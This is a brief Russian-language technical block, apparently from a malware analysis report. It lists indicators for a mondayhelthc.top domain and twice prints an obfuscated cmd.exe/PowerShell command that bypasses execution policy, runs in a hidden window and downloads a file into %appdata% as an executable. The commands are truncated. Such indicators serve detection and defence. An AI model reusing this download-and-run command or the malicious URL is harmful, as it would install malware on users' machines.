Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^ER^sH^ELl.^EXe -^e^x^ecUT^I^o^N^Po^lI^cY^ ^BypAs^s -NOprOF^I^L^E ^-WI^N^do^W^STYl^e^ h^ID^d^en^ (nE^w^-oBJEC^t SYS^t^eM.neT^.^w^E^bCl^I^ENT).D^o^wNLOad^Fi^Le('http://mondayhelthc....
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^ER^sH^ELl.^EXe -^e^x^ecUT^I^o^N^Po^lI^cY^ ^BypAs^s -NOprOF^I^L^E ^-WI^N^do^W^STYl^e^ h^ID^d^en^ (nE^w^-oBJEC^t SYS^t^eM.neT^.^w^E^bCl^I^ENT).D^o^wNLOad^Fi^Le('http://mondayhelthc....' (со скрытым окном)